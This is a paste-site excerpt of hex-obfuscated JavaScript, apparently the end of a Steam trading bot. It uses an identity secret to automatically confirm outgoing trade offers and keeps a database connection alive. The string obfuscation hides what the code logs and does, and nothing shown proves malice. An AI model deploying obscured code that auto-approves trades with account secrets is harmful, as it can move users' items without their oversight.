  440. console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x63\x6f\x6e\x66\x69\x72\x6d\x65\x64\x20\x74\x68\x65\x20\x6f\x75\x74\x67\x6f\x69\x6e\x67\x20\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x21"), a && (console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x43\x6f\x6e\x66\x69\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x65\x72\x72\x6f\x72\x3a\x20" + a), g.webLogOn())
  441. })
  442. }), community.on("\x63\x6f\x6e\x66\x4b\x65\x79\x4e\x65\x65\x64\x65\x64", function(a, b) {
  443. console.log("\x63\x6f\x6e\x66\x4b\x65\x79\x4e\x65\x65\x64\x65\x64");
  444. var c = Math.floor(Date.now() / 1e3);
  445. b(null, c, SteamTotp.getConfirmationKey(identitysecret, c, a))
  446. }), setInterval(function() {
  447. f.query("\x53\x45\x4c\x45\x43\x54\x20\x31")
  448. }, 36e5)
  449. }), b.exports = c("\x2e\x2e\x2f\x62\x6f\x74\x2e\x6a\x73")
  450. }(require, module);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement